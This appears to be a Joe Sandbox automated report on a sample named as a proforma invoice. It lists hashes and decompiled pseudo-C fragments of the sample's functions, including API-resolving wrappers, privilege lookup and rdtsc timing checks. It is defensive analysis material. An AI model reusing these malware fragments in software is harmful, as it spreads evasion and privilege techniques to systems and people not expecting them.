Instruction ID: ebff184ab25d764ec9997f1ae2c71121dbe96d34113ceaef00e44732014081f4
Opcode Fuzzy Hash: 39cd2fdc9211503a437203fcc2691d83f64ad06951d48b22d2f7b0609a6c654d
Instruction Fuzzy Hash: CE900262252041525645B15D54045075046E7E0382BE1D066A1404950C85669876E661

Uniqueness

Uniqueness Score: -1.00%

Function 00B299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B299AA

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2540690d2ead6151ddcca209c1a9dd23d578f12c768cdc3e6cc45727518cbb5d
Instruction ID: e938d662b4d9484ff174314ea348bb9394f6c777c4bc1d895eb74170cd72da60
Opcode Fuzzy Hash: 2540690d2ead6151ddcca209c1a9dd23d578f12c768cdc3e6cc45727518cbb5d
Instruction Fuzzy Hash: A89002A235100442D200615D5414B061045D7E1342FA1D069E1054554D8659CC72B166

Uniqueness

Uniqueness Score: -1.00%

Function 00B29910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2991A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8484c59c427f6a1a86fb6d65e32dc8e2a659183b4b9ff7f2b92fd16796e88fdf
Instruction ID: 735b9aad23be5d0cfea9bd0438fc2fdf892301e1139c1cf09d4997b5074f0825
Opcode Fuzzy Hash: 8484c59c427f6a1a86fb6d65e32dc8e2a659183b4b9ff7f2b92fd16796e88fdf
Instruction Fuzzy Hash: 1C9002B221100402D240715D54047461045D7D0342FA1D065A5054554E86998DF5B6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B29A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B29A2A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 323d25e76a08a406e2ecec2ee5aac3ac2ee7d7b62dbbe745758029746eeea091
Instruction ID: 0beb5d87f9baaa94efe03cfed43148141c99be9cef56654f4d9462b053319424
Opcode Fuzzy Hash: 323d25e76a08a406e2ecec2ee5aac3ac2ee7d7b62dbbe745758029746eeea091
Instruction Fuzzy Hash: F6900262611000424240716D98449065045FBE1352BA1D175A0988550D85998875A6A5

Uniqueness

Uniqueness Score: -1.00%

Function 00B29A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B29A0A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8f9fb09b96770e633fa6b189725f09eb62bd4a92a2eae40961d98df493d739d5
Instruction ID: 82728bc3feab409dbd768c5c12c089a1cc61ecde4e83928b3bca3a1331ed438c
Opcode Fuzzy Hash: 8f9fb09b96770e633fa6b189725f09eb62bd4a92a2eae40961d98df493d739d5
Instruction Fuzzy Hash: AC90027221140402D200615D581470B1045D7D0343FA1D065A1154555D86658871B5B1

Uniqueness

Uniqueness Score: -1.00%

Function 00B29A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B29A5A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66508a84c5eb5229483c739208f58f90ce3d2b357a3735b3667619588a447b53
Instruction ID: 8e76093c6a31cd484efdce5036fe7fa62bd3e7f3cb4a270b2d58b5ab7b885bb0
Opcode Fuzzy Hash: 66508a84c5eb5229483c739208f58f90ce3d2b357a3735b3667619588a447b53
Instruction Fuzzy Hash: 5390026222180042D300656D5C14B071045D7D0343FA1D169A0144554CC9558871A561

Uniqueness

Uniqueness Score: -1.00%

Function 00B295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B295DA

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 35df4d91cc8f5320d54d300838ddbeb588de2875e144546f6c2d6aa496cddf65
Instruction ID: ea1d66c8d26356a8e74515a9c259f31467c00e114c9c75ecb2e8927c570df243
Opcode Fuzzy Hash: 35df4d91cc8f5320d54d300838ddbeb588de2875e144546f6c2d6aa496cddf65
Instruction Fuzzy Hash: 0E9002A2212000034205715D5414616504AD7E0342FA1D075E1004590DC56588B1B165

Uniqueness

Uniqueness Score: -1.00%

Function 00B29540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2954A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 166c95eb9a4a0d720560c0e74d2bae3cd390c8958135cac1038d8a751593f9e6
Instruction ID: 5a62b587ae330c0c12b6f4ba4c9d22d4e4753b71cd8dea083ff2920a7087c14a
Opcode Fuzzy Hash: 166c95eb9a4a0d720560c0e74d2bae3cd390c8958135cac1038d8a751593f9e6
Instruction Fuzzy Hash: E3900266221000030205A55D17045071086D7D53927A1D075F1005550CD6618871A161

Uniqueness

Uniqueness Score: -1.00%

Function 00B296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B296EA

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9220d9fc190b6dc29df8d8b537c9eabfd346c81808887608adfee9a2c90f15af
Instruction ID: bcf856c95e8b98843b74d892fdce30ef7eac447addcf0936a6a145781fc6eaea
Opcode Fuzzy Hash: 9220d9fc190b6dc29df8d8b537c9eabfd346c81808887608adfee9a2c90f15af
Instruction Fuzzy Hash: 3A90027221108802D210615D940474A1045D7D0342FA5D465A4414658D86D588B1B161

Uniqueness

Uniqueness Score: -1.00%

Function 00B29660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2966A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af9c6828239848c3d8407343c8ef9080a0e38bf5124186ffd5ed8826f832d343
Instruction ID: 8c109e4b2a68c3cde4f3f7611a076f877b07f5a1e3f49ee8da9782f0f1841592
Opcode Fuzzy Hash: af9c6828239848c3d8407343c8ef9080a0e38bf5124186ffd5ed8826f832d343
Instruction Fuzzy Hash: AF90027221100802D280715D540464A1045D7D1342FE1D069A0015654DCA558A79B7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00B297A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B297AA

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07a5eb2ac73f91bacf4ed4bf2acfdf44cf7a235077328629d58b373541037387
Instruction ID: d03be2fdad351ceb6519aabe2191a7f3eacec4368525026a4c7b607958d4bd7a
Opcode Fuzzy Hash: 07a5eb2ac73f91bacf4ed4bf2acfdf44cf7a235077328629d58b373541037387
Instruction Fuzzy Hash: BF90026231100003D240715D64186065045E7E1342FA1E065E0404554CD9558876A262

Uniqueness

Uniqueness Score: -1.00%

Function 00B29780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2978A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a064efac0948db91664775d8ee61ce90dbf0014f86529c4b3d994a2ceb2e5330
Instruction ID: cf9395aa64ce13317f874940571d361989c70198cce3a0233d2bd5029b042f49
Opcode Fuzzy Hash: a064efac0948db91664775d8ee61ce90dbf0014f86529c4b3d994a2ceb2e5330
Instruction Fuzzy Hash: 5990026A22300002D280715D640860A1045D7D1343FE1E469A0005558CC9558879A361

Uniqueness

Uniqueness Score: -1.00%

Function 00B29FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B29FEA

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c97ef3c49447794dc6b6f23fce402f8fd2ffb94903bce9d7963793fb057bb5ec
Instruction ID: f07cc761912271a73e3795264e7dd54f3d4cb887cfcba2a2de2ba44cc8c7ac8e
Opcode Fuzzy Hash: c97ef3c49447794dc6b6f23fce402f8fd2ffb94903bce9d7963793fb057bb5ec
Instruction Fuzzy Hash: FE90027232114402D210615D94047061045D7D1342FA1D465A0814558D86D588B1B162

Uniqueness

Uniqueness Score: -1.00%

Function 00B29710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B2971A

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: cad33cdaa5a5c29378cb8d13b6d328516b8ac9531d6af442369a02e52dd4b712
Instruction ID: d568c14975628bd9b9463207fcf984f0de562f9d8acf614d21b1c4ee9d7a1fc0
Opcode Fuzzy Hash: cad33cdaa5a5c29378cb8d13b6d328516b8ac9531d6af442369a02e52dd4b712
Instruction Fuzzy Hash: 0690027221100402D200659D64086461045D7E0342FA1E065A5014555EC6A588B1B171

Uniqueness

Uniqueness Score: -1.00%

Function 004088B0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004088B0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088bb
0x004088c3
0x004088c5
0x004088ca
0x004088cf
0x004088e2
0x004088e7
0x004088f0
0x004088fc
0x0040890f
0x00408914
0x00408917
0x00408920
0x00408932
0x00408937
0x0040893c
0x00000000
0x00000000
0x0040893e
0x00408942
0x00000000
0x00000000
0x00408944
0x00000000
0x00408942
0x00408946
0x00408949
0x0040894f
0x00408951
0x0040895c
0x00408961
0x00408964
0x00408971
0x0040897c
0x0040897e
0x00408984
0x00408988
0x0040898b
0x0040898b
0x00408992
0x00408995
0x0040899a
0x004089a7
0x004088d6
0x004088d6
0x004088d6

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				L00419D20( &_v67, 0, 0x3f);
				L0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = L00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (L00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407260
0x0040726f
0x00407273
0x0040727e
0x0040728e
0x0040729e
0x004072a3
0x004072aa
0x004072ad
0x004072ba
0x004072bc
0x004072be
0x004072db
0x004072db
0x00000000
0x004072dd
0x004072e2

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA

Uniqueness

Uniqueness Score: -1.00%

Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E00418621(signed int __eax, intOrPtr __ecx, void* __edi, signed int __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t18;
				signed int _t30;

				asm("adc al, bh");
				_t30 = __eax & __esi;
				 *(__edi + 0x6b40b703) =  *(__edi + 0x6b40b703) ^ __esi;
				 *((intOrPtr*)(__esi - 0x74aa7628)) = __ecx;
				_push(_t30);
				_t15 = _a4;
				_push(__esi);
				E00418DC0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t18;
			}

0x00418623
0x00418625
0x00418626
0x0041862c
0x00418630
0x00418633
0x0041863c
0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: dc3a13e792b8cd6930beed1dad1d28573739f2e629ecc386193b3d534950f804
Instruction ID: 687a530a0da0f1e428c1a346c02b2add9f6048e8dc39be7ac047b9c802d344bb
Opcode Fuzzy Hash: dc3a13e792b8cd6930beed1dad1d28573739f2e629ecc386193b3d534950f804
Instruction Fuzzy Hash: 81F0EDB1300214AFCB20DF68CC80FD77B68EF88210F05856DF9899B241DA30E811CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184df
0x004184e7
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184a7
0x004184bd
0x004184c1

APIs

RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD

Memory Dump Source

Source File: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041864a
0x00418660
0x00418664

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660

Memory Dump Source

Source File: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418513
0x0041852a
0x00418538

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538

Memory Dump Source

Source File: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 00418504, Relevance: 1.5, APIs: 1, Instructions: 14
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E00418504(void* __eax, void* __ecx, void* __edx, void* __eflags) {
				intOrPtr* __esi;
				intOrPtr __ebp;
				char _t8;

				asm("rol dword [ecx], 1");
				if(__eflags >= 0) {
					__eflags = __ecx;
					asm("a16 pop ecx");
					_t1 = __edx + 0x52;
					_t2 = __esp;
					__esp =  *_t1;
					 *_t1 = _t2;
					_push(__ebp);
					__ebp = __esp;
					__eax =  *((intOrPtr*)(__ebp + 8));
					__ecx =  *((intOrPtr*)(__eax + 0xa14));
					_push(__esi);
					__esi = __eax + 0xc7c;
					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
					__edx =  *(__ebp + 0xc);
					__eax =  *__esi;
					ExitProcess( *(__ebp + 0xc));
				}
				asm("adc al, 0x52");
				_push(__eax);
				_t8 = RtlFreeHeap(__ecx); // executed
				return _t8;
			}

0x00418505
0x00418507
0x00418509
0x0041850b
0x0041850d
0x0041850d
0x0041850d
0x0041850d
0x00418510
0x00418511
0x00418513
0x00418516
0x0041851c
0x00418522
0x0041852a
0x0041852f
0x00418532
0x00418538
0x00418538
0x004184f7
0x004184fb
0x004184fd
0x00418501

APIs

RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD

Memory Dump Source

Source File: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Proforma Invoice and Bank swift-REG.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
Instruction ID: 6f1cddfd4babd5e96773481bc3a69ad9b38a3c8300a48473b802043c359ea8b8
Opcode Fuzzy Hash: 5e50d24f3ca5e3eb7828cc0e5e1aa839f0ec67a65d9ed96a778c0f6568fece54
Instruction Fuzzy Hash: 2AC012721012119FC22AEBA4A8818F2B738EF853213250A9FE0898B801CA25A4429AD0

Uniqueness

Uniqueness Score: -1.00%

Function 00B2967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00B29694

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2bd6383c187e544833f41ed55ffff53eb7082ece3671f1b17ae91fd57493e4c1
Instruction ID: 248884cdaae4526c80571b3a9d4ef9b72da54bb3ae9d2cbdcb74489edb484677
Opcode Fuzzy Hash: 2bd6383c187e544833f41ed55ffff53eb7082ece3671f1b17ae91fd57493e4c1
Instruction Fuzzy Hash: EFB09B729014D5C9D711D76456087177980F7D0741F66C4B5D1060641A4778C4A5F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B9B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE

Download Yara Rule

Strings

*** A stack buffer overrun occurred in %ws:%s, xrefs: 00B9B2F3
*** then kb to get the faulting stack, xrefs: 00B9B51C
The critical section is owned by thread %p., xrefs: 00B9B3B9
read from, xrefs: 00B9B4AD, 00B9B4B2
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B9B2DC
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B9B314
*** enter .exr %p for the exception record, xrefs: 00B9B4F1
*** Inpage error in %ws:%s, xrefs: 00B9B418
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B9B38F
a NULL pointer, xrefs: 00B9B4E0
This failed because of error %Ix., xrefs: 00B9B446
The resource is owned exclusively by thread %p, xrefs: 00B9B374
